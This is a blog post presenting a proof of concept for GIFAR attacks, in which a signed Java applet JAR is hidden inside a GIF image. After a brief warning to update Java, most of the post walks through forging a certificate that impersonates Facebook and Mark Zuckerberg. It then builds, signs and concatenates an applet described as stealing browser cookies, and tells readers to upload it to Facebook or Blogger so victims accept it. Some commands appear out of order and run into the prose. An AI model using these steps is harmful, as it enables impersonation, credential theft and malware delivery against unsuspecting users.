Here's a GIFAR (Applet JARS in hidden in Gif images) proof of concept with signed applets.
For those who do not understand how signed applets work, please update your java to latest version (6u13 as of writing this, which is safe from GIFAR).
Get java latest version from java.com
Also, never accept untrusted java certificates like shown in the above.
What is a signed applet? It is just an applet with RSA certificate to identify the source of the applet. It is also special in sense that it can access system files, commands, network ports etc on client side. While an unsigned applet can just steal your domain specific cookies, signed applets can ftp the whole cookies folder from your machine to an evil site, Or worse, it can download and execute binaries (read keylogger, spambot, virus, backdoors) from the internet.
Since it is very easy to create a fake certificate and cheap to buy a real one from verisign or thawte, it is always a good idea not to accept any certificates. You might also want to remove installed certificates from your java settings.
Now to the fun part (Creating a fake certificate to sign a dangerous applet...Muhahahahah!!!)
It is easy to create and sign applets with fake certificates. Just use the following to create a facebook signature:
$ keytool -genkey -keyalg rsa -alias facebookAfter which you can just generate the certificate:
Enter keystore password:
What is your first and last name?
[Unknown]: Mark
What is the name of your organizational unit?
[Unknown]: Zuckerberg
What is the name of your organization?
[Unknown]: Facebook, Inc.
What is the name of your City or Locality?
[Unknown]: Dublin
What is the name of your State or Province?
[Unknown]: Ireland
What is the two-letter country code for this unit?
[Unknown]: IR
Is CN=Mark, OU=Zuckerberg, O="Facebook, Inc.", L=Dublin, ST=Ireland, C=IR correct?
[no]: yes
Enter key password for
(RETURN if same as keystore password):
$ keytool -export -alias facebook -file Facebook2008RSA.certNow one can write some applet code to in a java file named helloWorld.java, which can access the system for the cookies directory of the browser (::evil::to steal all secrets). Use the below commands to build, pack, sign and attach to GIF file to create a GIFAR.
Enter keystore password:
Certificate stored in file
$ javac helloworld.javaNow just upload the GIFAR image and the certificate to any site which will can upload images (say blogger or facebook) and call the applet using archive with image URL; The certificate loads from the origin (where GIFAR is kept, like facebook). It also makes it very likely for someone to accept the certificate to create complete PAWNAGE.
$ jar cvf helloworld.jar helloworld.class
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: helloworld.class (in=2637) (out=1442) (deflated 45%)
Total:
------
(in = 2681) (out = 1826) (deflated 31%)
$ jarsigner helloworld.jar appsec
Enter Passphrase for keystore:
Warning:
The signer certificate will expire within six months.
$ cat media.gif helloworld.jar > gifar.gif
Notice that the certificate shows port as 8080, while applet is launched from port 8081. Also it supposedly published by facebook, Inc.
download Image here
This Gifar vector is fixed on JDK6u13. I'd say enough reasons to update. The latest java version breaks when loading GIFARs from internet which is a good thing. But it still does not says that the applet was being read from a GIFAR jar. Also local applet work from Gifar files.
No comments:
Post a Comment